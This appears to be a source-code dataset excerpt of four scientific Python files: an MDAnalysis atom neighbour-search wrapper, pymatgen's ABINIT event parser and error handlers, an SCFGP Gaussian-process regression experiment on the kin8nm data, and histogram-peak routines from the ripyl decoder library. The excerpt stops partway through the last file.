# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""
Neighbor Search wrapper for MDAnalysis --- :mod:`MDAnalysis.lib.NeighborSearch`
===============================================================================
This module contains classes that allow neighbor searches directly with
`AtomGroup` objects from `MDAnalysis`.
"""
import numpy as np
from MDAnalysis.lib.distances import capped_distance
from MDAnalysis.lib.util import unique_int_1d
class AtomNeighborSearch(object):
"""This class can be used to find all atoms/residues/segments within the
radius of a given query position.
For the neighbor search, this class is a wrapper around
:class:`~MDAnalysis.lib.distances.capped_distance`.
"""
def __init__(self, atom_group, box=None):
"""
Parameters
----------
atom_list : AtomGroup
list of atoms
box : array-like or ``None``, optional, default ``None``
Simulation cell dimensions in the form of
:attr:`MDAnalysis.trajectory.base.Timestep.dimensions` when
periodic boundary conditions should be taken into account for
the calculation of contacts.
"""
self.atom_group = atom_group
self._u = atom_group.universe
self._box = box
def search(self, atoms, radius, level='A'):
"""
Return all atoms/residues/segments that are within *radius* of the
atoms in *atoms*.
Parameters
----------
atoms : AtomGroup, MDAnalysis.core.groups.AtomGroup
AtomGroup object
radius : float
Radius for search in Angstrom.
level : str
char (A, R, S). Return atoms(A), residues(R) or segments(S) within
*radius* of *atoms*.
Returns
-------
AtomGroup : :class:`~MDAnalysis.core.groups.AtomGroup`
When ``level='A'``, AtomGroup is being returned.
ResidueGroup : :class:`~MDAnalysis.core.groups.ResidueGroup`
When ``level='R'``, ResidueGroup is being returned.
SegmentGroup : :class:`~MDAnalysis.core.groups.SegmentGroup`
When ``level='S'``, SegmentGroup is being returned.
.. versionchanged:: 2.0.0
Now returns :class:`AtomGroup` (when empty this is now an empty
:class:`AtomGroup` instead of an empty list), :class:`ResidueGroup`,
or a :class:`SegmentGroup`
"""
unique_idx = []
try:
# For atom groups, take the positions attribute
position = atoms.positions
except AttributeError:
# For atom, take the position attribute
position = atoms.position
pairs = capped_distance(position, self.atom_group.positions,
radius, box=self._box, return_distances=False)
if pairs.size > 0:
unique_idx = unique_int_1d(np.asarray(pairs[:, 1], dtype=np.intp))
return self._index2level(unique_idx, level)
def _index2level(self, indices, level):
"""Convert list of atom_indices in a AtomGroup to either the
Atoms or segments/residues containing these atoms.
Parameters
----------
indices
list of atom indices
level : str
char (A, R, S). Return atoms(A), residues(R) or segments(S) within
*radius* of *atoms*.
"""
atomgroup = self.atom_group[indices]
if level == 'A':
return atomgroup
elif level == 'R':
return atomgroup.residues
elif level == 'S':
return atomgroup.segments
else:
raise NotImplementedError('{0}: level not implemented'.format(level))
| MDAnalysis/mdanalysis | package/MDAnalysis/lib/NeighborSearch.py | Python | gpl-2.0 | 4,718 | [
"MDAnalysis"
] | 8fb118bb51186202d879fbea2d1e4485c71ff33342424106f4fa8c45279ba1c7 |
# coding: utf-8
"""
This module defines the events signaled by abinit during the execution. It also
provides a parser to extract these events form the main output file and the log file.
"""
from __future__ import unicode_literals, division, print_function
import sys
import os.path
import datetime
import collections
import yaml
import six
import abc
import logging
import inspect
import numpy as np
from monty.string import indent, is_string, list_strings
from monty.fnmatch import WildCard
from monty.termcolor import colored
from monty.inspect import all_subclasses
from monty.json import MontyDecoder
from pymatgen.core import Structure
from pymatgen.serializers.json_coders import PMGSONable, pmg_serialize
from .abiinspect import YamlTokenizer
logger = logging.getLogger(__name__)
__all__ = [
"EventsParser",
]
def straceback():
"""Returns a string with the traceback."""
import traceback
return traceback.format_exc()
class AbinitEvent(yaml.YAMLObject):
"""
Example (YAML syntax)::
Normal warning without any handler:
--- !Warning
message: |
This is a normal warning that won't
trigger any handler in the python code!
src_file: routine_name
src_line: 112
...
Critical warning that will trigger some action in the python code.
--- !ScfConvergeWarning
message: |
The human-readable message goes here!
src_file: foo.F90
src_line: 112
tolname: tolwfr
actual_tol: 1.0e-8
required_tol: 1.0e-10
nstep: 50
...
The algorithm to extract the YAML sections is very simple.
1) We use YamlTokenizer to extract the documents from the output file
2) If we have a tag that ends with "Warning", "Error", "Bug", "Comment
we know we have encountered a new ABINIT event
3) We parse the document with yaml.load(doc.text) and we get the object
Note that:
# --- and ... become reserved words (whey they are placed at
the begining of a line) since they are used to mark the beginning and
the end of YAML documents.
# All the possible events should subclass `AbinitEvent` and define
the class attribute yaml_tag so that yaml.load will know how to
build the instance.
"""
color = None
def __init__(self, src_file, src_line, message):
"""
Basic constructor for :class:`AbinitEvent`.
Args:
message: String with human-readable message providing info on the event.
src_file: String with the name of the Fortran file where the event is raised.
src_line Integer giving the line number in src_file.
"""
self.message = message
self._src_file = src_file
self._src_line = src_line
#print("src_file", src_file, "src_line", src_line)
@pmg_serialize
def as_dict(self):
return dict(message=self.message, src_file=self.src_file, src_line=self.src_line, yaml_tag=self.yaml_tag)
@classmethod
def from_dict(cls, d):
cls = as_event_class(d.get("yaml_tag"))
return cls(**{k: v for k,v in d.items() if k != "yaml_tag" and not k.startswith("@")})
@property
def header(self):
return "<%s at %s:%s>" % (self.name, self.src_file, self.src_line)
def __repr__(self):
return self.header
def __str__(self):
return "\n".join((self.header, self.message))
def __eq__(self, other):
if other is None: return False
return self.message == other.message
def __ne__(self, other):
return not self.__eq__(other)
@property
def src_file(self):
"""String with the name of the Fortran file where the event is raised."""
try:
return self._src_file
except AttributeError:
return "Unknown"
@property
def src_line(self):
"""Integer giving the line number in src_file."""
try:
return self._src_line
except AttributeError:
return "Unknown"
@property
def name(self):
"""Name of the event (class name)"""
return self.__class__.__name__
@property
def baseclass(self):
"""The baseclass of self."""
for cls in _BASE_CLASSES:
if isinstance(self, cls):
return cls
raise ValueError("Cannot determine the base class of %s" % self.__class__.__name__)
def correct(self, task):
"""
This method is called when an error is detected in a :class:`Task`
It should perform any corrective measures relating to the detected error.
The idea is similar to the one used in custodian but the handler receives
a :class:`Task` object so that we have access to its methods.
Returns:
(dict) JSON serializable dict that describes the errors and actions taken. E.g.
{"errors": list_of_errors, "actions": list_of_actions_taken}.
If this is an unfixable error, actions should be set to None.
"""
return 0
class AbinitComment(AbinitEvent):
"""Base class for Comment events"""
yaml_tag = '!COMMENT'
color = "blue"
class AbinitError(AbinitEvent):
"""Base class for Error events"""
yaml_tag = '!ERROR'
color = "red"
class AbinitYamlError(AbinitError):
"""
Raised if the YAML parser cannot parse the document and the doc tag is an Error.
It's an AbinitError because the msg produced by the code is not valid YAML!
"""
class AbinitBug(AbinitEvent):
"""Base class for Bug events"""
yaml_tag = '!BUG'
color = "red"
class AbinitWarning(AbinitEvent):
"""
Base class for Warning events (the most important class).
Developers should subclass this class to define the different exceptions
raised by the code and the possible actions that can be performed.
"""
yaml_tag = '!WARNING'
color = None
class AbinitCriticalWarning(AbinitWarning):
color = "red"
class AbinitYamlWarning(AbinitCriticalWarning):
"""
Raised if the YAML parser cannot parse the document and the doc tas is a Warning.
"""
# Warnings that trigger restart.
class ScfConvergenceWarning(AbinitCriticalWarning):
"""Warning raised when the GS SCF cycle did not converge."""
yaml_tag = '!ScfConvergenceWarning'
class NscfConvergenceWarning(AbinitCriticalWarning):
"""Warning raised when the GS NSCF cycle did not converge."""
yaml_tag = '!NscfConvergenceWarning'
class RelaxConvergenceWarning(AbinitCriticalWarning):
"""Warning raised when the structural relaxation did not converge."""
yaml_tag = '!RelaxConvergenceWarning'
# TODO: for the time being we don't discern between GS and PhononCalculations.
#class PhononConvergenceWarning(AbinitCriticalWarning):
# """Warning raised when the phonon calculation did not converge."""
# yaml_tag = u'!PhononConvergenceWarning'
class QPSConvergenceWarning(AbinitCriticalWarning):
"""Warning raised when the QPS iteration (GW) did not converge."""
yaml_tag = '!QPSConvergenceWarning'
class HaydockConvergenceWarning(AbinitCriticalWarning):
"""Warning raised when the Haydock method (BSE) did not converge."""
yaml_tag = '!HaydockConvergenceWarning'
# Error classes providing a correct method.
# Register the concrete base classes.
_BASE_CLASSES = [
AbinitComment,
AbinitError,
AbinitBug,
AbinitWarning,
]
class EventReport(collections.Iterable, PMGSONable):
"""
Iterable storing the events raised by an ABINIT calculation.
Attributes::
stat: information about a file as returned by os.stat
"""
def __init__(self, filename, events=None):
"""
List of ABINIT events.
Args:
filename: Name of the file
events: List of Event objects
"""
self.filename = os.path.abspath(filename)
self.stat = os.stat(self.filename)
self.start_datetime, self.end_datetime = None, None
self._events = []
self._events_by_baseclass = collections.defaultdict(list)
if events is not None:
for ev in events:
self.append(ev)
def __len__(self):
return len(self._events)
def __iter__(self):
return self._events.__iter__()
def __getitem__(self, slice):
return self._events[slice]
def __str__(self):
#has_colours = stream_has_colours(stream)
has_colours = True
lines = []
app = lines.append
app("Events found in %s\n" % self.filename)
for i, event in enumerate(self):
if has_colours:
app("[%d] %s" % (i+1, colored(event.header, color=event.color)))
app(indent(event.message, 4))
else:
app("[%d] %s" % (i+1, str(event)))
app("num_errors: %s, num_warnings: %s, num_comments: %s, completed: %s\n" % (
self.num_errors, self.num_warnings, self.num_comments, self.run_completed))
return "\n".join(lines)
def append(self, event):
"""Add an event to the list."""
self._events.append(event)
self._events_by_baseclass[event.baseclass].append(event)
def set_run_completed(self, boolean, start_datetime, end_datetime):
"""Set the value of _run_completed."""
self._run_completed = boolean
if (start_datetime, end_datetime) != (None, None):
# start_datetime: Sat Feb 28 23:54:27 2015
# end_datetime: Sat Feb 28 23:54:30 2015
try:
fmt = "%a %b %d %H:%M:%S %Y"
self.start_datetime = datetime.datetime.strptime(start_datetime, fmt)
self.end_datetime = datetime.datetime.strptime(end_datetime, fmt)
except Exception as exc:
# Maybe LOCALE != en_US
logger.warning(str(exc))
@property
def run_etime(self):
"""Wall-time of the run as `timedelta` object."""
if self.start_datetime is None or self.end_datetime is None:
return None
return self.end_datetime - self.start_dateime
@property
def run_completed(self):
"""True if the calculation terminated."""
try:
return self._run_completed
except AttributeError:
return False
@property
def comments(self):
"""List of comments found."""
return self.select(AbinitComment)
@property
def errors(self):
"""List of errors + bugs found."""
return self.select(AbinitError) + self.select(AbinitBug)
@property
def warnings(self):
"""List of warnings found."""
return self.select(AbinitWarning)
@property
def num_warnings(self):
"""Number of warnings reported."""
return len(self.warnings)
@property
def num_errors(self):
"""Number of errors reported."""
return len(self.errors)
@property
def num_comments(self):
"""Number of comments reported."""
return len(self.comments)
def select(self, base_class):
"""
Return the list of events that inherits from class base_class
"""
return self._events_by_baseclass[base_class]
def filter_types(self, event_types):
events = []
for ev in self:
if type(ev) in event_types: events.append(ev)
return self.__class__(filename=self.filename, events=events)
def get_events_of_type(self, event_class):
"""Return a list of events of the given class."""
return [ev for ev in self if type(ev) == event_class]
@pmg_serialize
def as_dict(self):
return dict(filename=self.filename, events=[e.as_dict() for e in self._events])
@classmethod
def from_dict(cls, d):
return cls(filename=d["filename"], events=[AbinitEvent.from_dict(e) for e in d["events"]])
class EventsParserError(Exception):
"""Base class for the exceptions raised by :class:`EventsParser`."""
class EventsParser(object):
"""
Parses the output or the log file produced by ABINIT and extract the list of events.
"""
Error = EventsParserError
def parse(self, filename, verbose=0):
"""
Parse the given file. Return :class:`EventReport`.
"""
run_completed, start_datetime, end_datetime = False, None, None
filename = os.path.abspath(filename)
report = EventReport(filename)
# TODO Use CamelCase for the Fortran messages.
# Bug is still an error of class SoftwareError
w = WildCard("*Error|*Warning|*Comment|*Bug|*ERROR|*WARNING|*COMMENT|*BUG")
with YamlTokenizer(filename) as tokens:
for doc in tokens:
if w.match(doc.tag):
#print("got doc.tag", doc.tag,"--")
try:
#print(doc.text)
event = yaml.load(doc.text)
#print(event.yaml_tag, type(event))
except:
#raise
# Wrong YAML doc. Check tha doc tag and instantiate the proper event.
message = "Malformatted YAML document at line: %d\n" % doc.lineno
message += doc.text
# This call is very expensive when we have many exceptions due to malformatted YAML docs.
if verbose:
message += "Traceback:\n %s" % straceback()
if "error" in doc.tag.lower():
print("It seems an error", doc.tag)
event = AbinitYamlError(message=message, src_file=__file__, src_line=0)
else:
event = AbinitYamlWarning(message=message, src_file=__file__, src_line=0)
event.lineno = doc.lineno
report.append(event)
# Check whether the calculation completed.
if doc.tag == "!FinalSummary":
run_completed = True
d = doc.as_dict()
start_datetime, end_datetime = d["start_datetime"], d["end_datetime"]
report.set_run_completed(run_completed, start_datetime, end_datetime)
return report
def report_exception(self, filename, exc):
"""
This method is used when self.parser raises an Exception so that
we can report a customized :class:`EventReport` object with info the exception.
"""
# Build fake event.
event = AbinitError(src_file="Unknown", src_line=0, message=str(exc))
return EventReport(filename, events=[event])
class EventHandler(six.with_metaclass(abc.ABCMeta, object)):
"""
Abstract base class defining the interface for an EventHandler.
The__init__ should always provide default values for its arguments so that we can
easily instantiate the handlers with:
handlers = [cls() for cls in get_event_handler_classes()]
The defaul values should be chosen so to cover the most typical cases.
Each EventHandler should define the class attribute `can_change_physics`
that is true if the handler changes `important` parameters of the
run that are tightly connected to the physics of the system.
For example, an `EventHandler` that changes the value of `dilatmx` and
prepare the restart is not changing the physics. Similarly a handler
that changes the mixing algorithm. On the contrary, a handler that
changes the value of the smearing is modifying an important physical
parameter, and the user should be made aware of this so that
there's an explicit agreement between the user and the code.
The default handlers are those that do not change the physics,
other handlers can be installed by the user when constructing with the flow with
TODO
.. warning::
The EventHandler should perform any action at the level of the input files
needed to solve the problem and then prepare the task for a new submission
The handler should never try to resubmit the task. The submission must be
delegated to the scheduler or Fireworks.
"""
event_class = AbinitEvent
"""AbinitEvent subclass associated to this handler."""
#can_change_physics
FIXED = 1
NOT_FIXED = 0
@classmethod
def cls2str(cls):
lines = []
app = lines.append
ecls = cls.event_class
app("event name = %s" % ecls.yaml_tag)
app("event documentation: ")
lines.extend(ecls.__doc__.split("\n"))
app("handler documentation: ")
lines.extend(cls.__doc__.split("\n"))
return "\n".join(lines)
def __str__(self):
return "<%s>" % self.__class__.__name__
def can_handle(self, event):
"""True if this handler is associated to the given :class:`AbinitEvent`"""
return self.event_class == event.__class__
# TODO: defined CorrectionRecord object and provide helper functions to build it
def count(self, task):
"""
Return the number of times the event associated to this handler
has been already fixed in the :class:`Task`.
"""
return len([c for c in task.corrections if c["event"]["@class"] == self.event_class])
@abc.abstractmethod
def handle_task_event(self, task, event):
"""
Method to handle Abinit events.
Args:
task: :class:`Task` object.
event: :class:`AbinitEvent` found in the log file.
Return:
0 if no action has been applied, 1 if the problem has been fixed.
"""
@pmg_serialize
def as_dict(self):
#@Guido this introspection is nice but it's not safe
d = {}
if hasattr(self, "__init__"):
for c in inspect.getargspec(self.__init__).args:
if c != "self":
d[c] = self.__getattribute__(c)
return d
@classmethod
def from_dict(cls, d):
kwargs = {k: v for k, v in d.items() if k in inspect.getargspec(cls.__init__).args}
return cls(**kwargs)
@classmethod
def compare_inputs(cls, new_input, old_input):
def vars_dict(d):
"""
make a simple dictionary and convert numpy arrays to lists
"""
new_d = {}
for key, value in d.items():
if isinstance(value, np.ndarray): value = value.tolist()
new_d[key] = value
return new_d
new_vars = vars_dict(new_input)
old_vars = vars_dict(old_input)
new_keys = set(new_vars.keys())
old_keys = set(old_vars.keys())
intersect = new_keys.intersection(old_keys)
added_keys = new_keys - intersect
removed_keys = old_keys - intersect
changed_keys = set(v for v in intersect if new_vars[v] != old_vars[v])
log_diff = {}
if added_keys:
log_diff['_set'] = {k: new_vars[k] for k in added_keys}
if changed_keys:
log_diff['_update'] = ({k: {'new': new_vars[k], 'old': old_vars[k]} for k in changed_keys})
if new_input.structure != old_input.structure:
log_diff['_change_structure'] = new_input.structure.as_dict()
if removed_keys:
log_diff['_pop'] = {k: old_vars[k] for k in removed_keys}
return log_diff
class Correction(PMGSONable):
def __init__(self, handler, actions, event, reset=False):
self.handler = handler
self.actions = actions
self.event = event
self.reset = reset
@pmg_serialize
def as_dict(self):
return dict(handler=self.handler.as_dict(), actions=self.actions, event=self.event.as_dict(), reset=self.reset)
@classmethod
def from_dict(cls, d):
dec = MontyDecoder()
return cls(handler=dec.process_decoded(d['handler']), actions=d['actions'],
event=dec.process_decoded(d['event']), reset=d['reset'])
#class WarningHandler(EventHandler):
# """Base class for handlers associated to ABINIT warnings."""
# event_class = AbinitWarning
#
#class BugHandler(EventHandler):
# """Base class for handlers associated to ABINIT bugs."""
# event_class = AbinitBug
class ErrorHandler(EventHandler):
"""Base class for handlers associated to ABINIT errors."""
event_class = AbinitError
_ABC_EVHANDLER_CLASSES = set([ErrorHandler,])
# Public API
def autodoc_event_handlers(stream=sys.stdout):
"""
Print to the given string, the documentation for the events
and the associated handlers.
"""
lines = []
for cls in all_subclasses(EventHandler):
if cls in _ABC_EVHANDLER_CLASSES: continue
event_class = cls.event_class
lines.extend(cls.cls2str().split("\n"))
# Here we enforce the abstract protocol of the class
# The unit test in tests_events will detect the problem.
if not hasattr(cls, "can_change_physics"):
raise RuntimeError("%s: can_change_physics must be defined" % cls)
stream.write("\n".join(lines) + "\n")
def get_event_handler_classes(categories=None):
"""Return the list of handler classes."""
classes = [c for c in all_subclasses(EventHandler) if c not in _ABC_EVHANDLER_CLASSES]
return classes
def as_event_class(obj):
"""
Convert obj into a subclass of AbinitEvent.
obj can be either a class or a string with the class name or the YAML tag
"""
if is_string(obj):
for c in all_subclasses(AbinitEvent):
if c.__name__ == obj or c.yaml_tag == obj: return c
raise ValueError("Cannot find event class associated to %s" % obj)
# Assume class.
assert obj in all_subclasses(AbinitEvent)
return obj
############################################
########## Concrete classes ################
############################################
class DilatmxError(AbinitError):
"""
This Error occurs in variable cell calculations when the increase in the
unit cell volume is too large.
"""
yaml_tag = '!DilatmxError'
#def correct(self, task):
# #Idea: decrease dilatxm and restart from the last structure.
# #We would like to end up with a structures optimized with dilatmx 1.01
# #that will be used for phonon calculations.
# if not self.enabled:
# task.log_correction(self, "Handler for %s has been disabled")
# return 1 # what?
# # Read the last structure dumped by ABINIT before aborting.
# print("in dilatmx")
# filepath = task.outdir.has_abiext("DILATMX_STRUCT.nc")
# last_structure = Structure.from_file(filepath)
# task._change_structure(last_structure)
# #changes = task._modify_vars(dilatmx=1.05)
# action = "Take last structure from DILATMX_STRUCT.nc, will restart with dilatmx: %s" % task.get_inpvar("dilatmx")
# task.log_correction(self, action)
# return 1
class DilatmxErrorHandler(ErrorHandler):
"""
Handle DilatmxError. Abinit produces a netcdf file with the last structure before aborting
The handler changes the structure in the input with the last configuration and modify the value of dilatmx.
"""
event_class = DilatmxError
can_change_physics = False
def __init__(self, max_dilatmx=1.3):
self.max_dilatmx = max_dilatmx
def handle_task_event(self, task, event):
# Read the last structure dumped by ABINIT before aborting.
filepath = task.outdir.has_abiext("DILATMX_STRUCT.nc")
last_structure = Structure.from_file(filepath)
task._change_structure(last_structure)
#read the suggested dilatmx
# new_dilatmx = 1.05
# if new_dilatmx > self.max_dilatmx:
# msg = "Suggested dilatmx ({}) exceeds maximux configured value ({}).".format(new_dilatmx, self.max_dilatmx)
# return self.NOT_FIXED
# task.strategy.abinit_input.set_vars(dilatmx=new_dilatmx)
msg = "Take last structure from DILATMX_STRUCT.nc, will try to restart with dilatmx %s" % task.get_inpvar("dilatmx")
task.log_correction(event, msg)
# Note that we change the structure but we don't try restart from the previous WFK|DEN file
# because Abinit called mpi_abort and therefore no final WFK|DEN file has been produced.
return self.FIXED
def handle_input_event(self, abiinput, outdir, event):
try:
old_abiinput = abiinput.deepcopy()
# Read the last structure dumped by ABINIT before aborting.
filepath = outdir.has_abiext("DILATMX_STRUCT.nc")
last_structure = Structure.from_file(filepath)
abiinput.set_structure(last_structure)
return Correction(self, self.compare_inputs(abiinput, old_abiinput), event, False)
except Exception as exc:
logger.warning('Error while trying to apply the handler {}.'.format(str(self)), exc)
return None
"""
class DilatmxErrorHandlerTest(ErrorHandler):
def __init__(self, max_dilatmx=1.3):
self.max_dilatmx = max_dilatmx
def handle_task_event(self, task, event):
msg = event.message
# Check if the handler is suitable to deal with this error
if msg.find("You need at least dilatmx=") == -1:
return {"status": self.NOT_FIXED, "msg": "{} can not fix event: {}".format(self.__class__, event)}
#read the suggested dilatmx
try:
new_dilatmx = float(msg.split('dilatmx=')[1].split('\n')[0].strip())
except:
return {"status": self.NOT_FIXED, "msg": "Couldn't parse dilatmx."}
if new_dilatmx > self.max_dilatmx:
msg = "Suggested dilatmx ({}) exceeds maximux configured value ({}).".format(new_dilatmx, self.max_dilatmx)
return self.NOT_FIXED
task.strategy.abinit_input.set_vars(dilatmx=new_dilatmx)
msg = "Take last structure from DILATMX_STRUCT.nc, will try to restart with dilatmx %s" % task.get_inpvar("dilatmx")
task.log_correction(event, msg)
return self.FIXED
"""
class TolSymError(AbinitError):
"""
Class of errors raised by Abinit when it cannot detect the symmetries of the system.
The handler assumes the structure makes sense and the error is just due to numerical inaccuracies.
We increase the value of tolsym in the input file (default 1-8) so that Abinit can find the space group
and re-symmetrize the input structure.
"""
yaml_tag = '!TolSymError'
class TolSymErrorHandler(ErrorHandler):
"""
Increase the value of tolsym in the input file.
"""
event_class = TolSymError
can_change_physics = False
def __init__(self, max_nfixes=3):
self.max_nfixes = max_nfixes
def handle_task_event(self, task, event):
# TODO: Add limit on the number of fixes one can do for the same error
# For example in this case, the scheduler will stop after 20 submissions
if self.count(task) > self.max_nfixes:
return self.NOT_FIXED
old_tolsym = task.get_inpvar("tolsym")
new_tolsym = 1e-6 if old_tolsym is None else old_tolsym * 10
task._set_inpvars(tolsym=new_tolsym)
task.log_correction(event, "Increasing tolsym from %s to %s" % (old_tolsym, new_tolsym))
return self.FIXED
def handle_input_event(self, abiinput, outdir, event):
try:
old_abiinput = abiinput.deepcopy()
old_tolsym = abiinput["tolsym"]
new_tolsym = 1e-6 if old_tolsym is None else old_tolsym * 10
abiinput.set_vars(tolsym=new_tolsym)
return Correction(self, self.compare_inputs(abiinput, old_abiinput), event, False)
except Exception as exc:
logger.warning('Error while trying to apply the handler {}.'.format(str(self)), exc)
return None
| rousseab/pymatgen | pymatgen/io/abinitio/events.py | Python | mit | 28,120 | [
"ABINIT",
"NetCDF",
"pymatgen"
] | 5cb0e594a51daee1c551e16f31460119a28a9b434a508296385c8daeaae164b3 |
################################################################################
# SCFGP: Sparsely Correlated Fourier Features Based Gaussian Process
# Github: https://github.com/MaxInGaussian/SCFGP
# Author: Max W. Y. Lam (maxingaussian@gmail.com)
################################################################################
import numpy as np
import matplotlib.pyplot as plt
try:
from SCFGP import *
except:
print("SCFGP is not installed yet! Trying to call directly from source...")
from sys import path
path.append("../../")
from SCFGP import *
print("done.")
def load_kin8nm_data(proportion=3192./8192):
from sklearn import datasets
from sklearn import cross_validation
kin8nm = datasets.fetch_mldata('regression-datasets kin8nm')
X, y = kin8nm.data[:, :-1], kin8nm.data[:, -1]
y = y[:, None]
X = X.astype(np.float64)
X_train, X_test, y_train, y_test = \
cross_validation.train_test_split(X, y, test_size=proportion)
return X_train, y_train, X_test, y_test
repeats = 3
feature_size_choices = [50]
scores = []
nmses = []
mnlps = []
for _ in range(repeats):
X_train, y_train, X_test, y_test = load_kin8nm_data()
for exp in [True, False]:
model = SCFGP(-1, 20, False)
model.fit(X_train, y_train, X_test, y_test, plot_training=True)
nmses.append(model.TsNMSE)
mnlps.append(model.TsMNLP)
scores.append(model.SCORE)
print("\n>>>", model.NAME, exp)
print(" NMSE = %.4f | Avg = %.4f | Std = %.4f"%(
model.TsNMSE, np.mean(nmses), np.std(nmses)))
print(" MNLP = %.4f | Avg = %.4f | Std = %.4f"%(
model.TsMNLP, np.mean(mnlps), np.std(mnlps)))
print(" Score = %.4f | Avg = %.4f | Std = %.4f"%(
model.SCORE, np.mean(scores), np.std(scores))) | MaxInGaussian/SCFGP | experiments/kin8nm/test_regression.py | Python | bsd-3-clause | 1,832 | [
"Gaussian"
] | 6473d03bd0e211e062c20947aa33f75679b501033eeab4b1ad16ddb0bdd55a7f |
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''General routines shared between decoders
'''
# Copyright © 2013 Kevin Thibedeau
# This file is part of Ripyl.
# Ripyl is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
# Ripyl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
# You should have received a copy of the GNU Lesser General Public
# License along with Ripyl. If not, see <http://www.gnu.org/licenses/>.
from __future__ import print_function, division
import numpy as np
import scipy as sp
import math
import collections
import itertools
import ripyl.util.stats as stats
from ripyl.streaming import ChunkExtractor, StreamError, AutoLevelError
from ripyl.util.equality import relatively_equal
#import matplotlib.pyplot as plt
def gen_histogram(raw_samples, bins, use_kde=False, kde_bw=0.05):
'''Generate a histogram using either normal binning or a KDE
raw_samples (sequence of numbers)
A sequence representing the population of data samples that will be
analyzed for peaks
bins (int)
The number of bins to use for the histogram
use_kde (bool)
Boolean indicating whether to construct the histogram from a Kernel Density
Estimate. This is useful for approximating normally distributed peaks on
synthetic data sets lacking noise.
kde_bw (float)
Float providing the bandwidth parameter for the KDE
Returns a tuple (hist, bin_centers) containing lists of the histogram bins and
the center value of each bin.
Raises ValueError if a KDE cannot be constructed
'''
if not use_kde:
hist, bin_edges = np.histogram(raw_samples, bins=bins)
bin_centers = (bin_edges[:-1] + bin_edges[1:]) / 2
else:
try:
#print('#### len(raw_samples)', len(raw_samples))
kde = sp.stats.gaussian_kde(raw_samples, bw_method=kde_bw)
except np.linalg.linalg.LinAlgError:
# If the sample data set contains constant samples, gaussian_kde()
# will raise this exception.
raise ValueError('Cannot construct KDE for histogram approximation. No sample variation present')
mxv = max(raw_samples)
mnv = min(raw_samples)
r = mxv - mnv
# Expand the upper and lower bounds by 10% to allow room for gaussian tails at the extremes
mnv -= r * 0.1
mxv += r * 0.1
step = (mxv - mnv) / bins
bin_centers = np.arange(mnv, mxv, step)
hist = 1000 * kde(bin_centers)
return hist, bin_centers
def find_bot_top_hist_peaks(raw_samples, bins, use_kde=False, kde_bw=0.05):
'''Find the bottom and top peaks in a histogram of data sample magnitudes.
These are the left-most and right-most of the two largest peaks in the histogram.
raw_samples (sequence of numbers)
A sequence representing the population of data samples that will be
analyzed for peaks
bins (int)
The number of bins to use for the histogram
use_kde (bool)
Boolean indicating whether to construct the histogram from a Kernel Density
Estimate. This is useful for approximating normally distributed peaks on
synthetic data sets lacking noise.
kde_bw (float)
Float providing the bandwidth parameter for the KDE
Returns a 2-tuple (bot, top) representing the bottom and top peaks. The value for
each peak is the center of the histogram bin that represents the midpoint of the
population for that peak.
Returns None if less than two peaks are found in the histogram
Raises ValueError if a KDE cannot be constructed
'''
hist, bin_centers = gen_histogram(raw_samples, bins, use_kde, kde_bw)
#plt.plot(bin_centers, hist)
#plt.show()
peaks = find_hist_peaks(hist)
if len(peaks) < 2:
# In some cases where 1's or 0's are significantly dominant over the other
# the histogram is too skewed and find_hist_peaks() sets a threshold too high.
# Split the histogram and attempt to find peaks in each half to handle this case
half = len(hist) // 2
l_peaks = find_hist_peaks(hist[:half])
r_peaks = find_hist_peaks(hist[half:])
if len(l_peaks) >= 1 and len(r_peaks) >= 1:
peaks = l_peaks
peaks.extend((p[0] + half, p[1] + half) for p in r_peaks)
#print('$$$$ peaks2:', peaks)
# Make sure we have at least two peaks
if len(peaks) < 2:
return None
# Take the lower and upper peaks from the list
end_peaks = (peaks[0], peaks[-1])
# get the center of each peak
bot_top = []
for p in end_peaks:
hslice = hist[p[0]:p[1]+1] # the bins for this peak
cs = np.cumsum(hslice)
mid_pop = cs[-1] // 2
# find the bin where we reach the population midpoint
mid_ix = 0
for i, s in enumerate(cs):
if s >= mid_pop:
mid_ix = i
break
#TODO: consider interpolating between two bins nearest to the float(mid_pop)
# get the original bin center for this population midpoint
bot_top.append(bin_centers[p[0] + mid_ix])
return tuple(sorted(bot_top))
def find_hist_peaks(hist, thresh_scale=1.0):
'''Find all peaks in a histogram
This uses a modification of the method employed by the "peaks" function in
LeCroy digital oscilloscopes. The original algorithm is described in various manuals
such as the 9300 WP03 manual or WavePro manual RevC 2002 (p16-14).
This algorithm works well for real world data sets where the histogram peaks are
normally distributed (i.e. there is some noise present in the data set).
For synthetic waveforms lacking noise or any intermediate samples between discrete
logic levels, the statistical measures used to determine the threshold for a peak
are not valid. The threshold t2 ends up being too large and valid peaks may be
excluded. To avoid this problem the histogram can be sampled from a KDE instead or
the thresh_scale parameter can be set to a lower value.
hist (sequence of int)
A sequence representing the histogram bin counts. Typically the first parameter
returned by numpy.histogram() or a KDE from scipy.stats.gaussian_kde().
thresh_scale (float)
Apply a scale factor to the internal threshold for peak classification.
Returns a list of peaks where each peak is a 2-tuple representing the
start and end indices of the peak in hist.
'''
# get mean of all populated bins
os = stats.OnlineStats()
pop_bins = [b for b in hist if b > 0]
os.accumulate_array(pop_bins)
pop_mean = os.mean()
t1 = pop_mean + 2.0 * math.sqrt(pop_mean)
#print('@@@@@ t1', t1, pop_mean)
# find std. dev. of all populated bins under t1
os.reset()
os.accumulate_array([b for b in pop_bins if b < t1])
t2 = pop_mean + thresh_scale * 2.0 * os.std(ddof=1) # Lecroy uses 2*std but that can be unreliable
#print('@@@@@ t2', t2, pop_mean, os.std(ddof=1))
#plt.plot(hist)
#plt.axhline(t1, color='k')
#plt.axhline(t2, color='g')
#plt.axhline(pop_mean, color='r')
#plt.axhline(os.mean(), color='y')
#plt.show()
# t2 is the threshold we will use to classify a bin as part of a peak
# Essentially it is saying that a peak is any bin more than 2 std. devs.
# above the mean. t1 was used to prevent the most extreme outliers from biasing
# the std. dev.
NEED_PEAK = 1
IN_PEAK = 2
state = NEED_PEAK
peaks = []
peak_start = -1
for i, b in enumerate(hist):
if state == NEED_PEAK:
if b >= t2:
peak_start = i
state = IN_PEAK
elif state == IN_PEAK:
if b < t2:
peaks.append((peak_start, i))
state = NEED_PEAK
